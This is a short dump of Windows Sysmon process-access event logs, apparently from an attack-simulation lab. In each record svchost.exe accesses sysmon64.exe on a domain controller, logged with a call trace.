{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1515,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
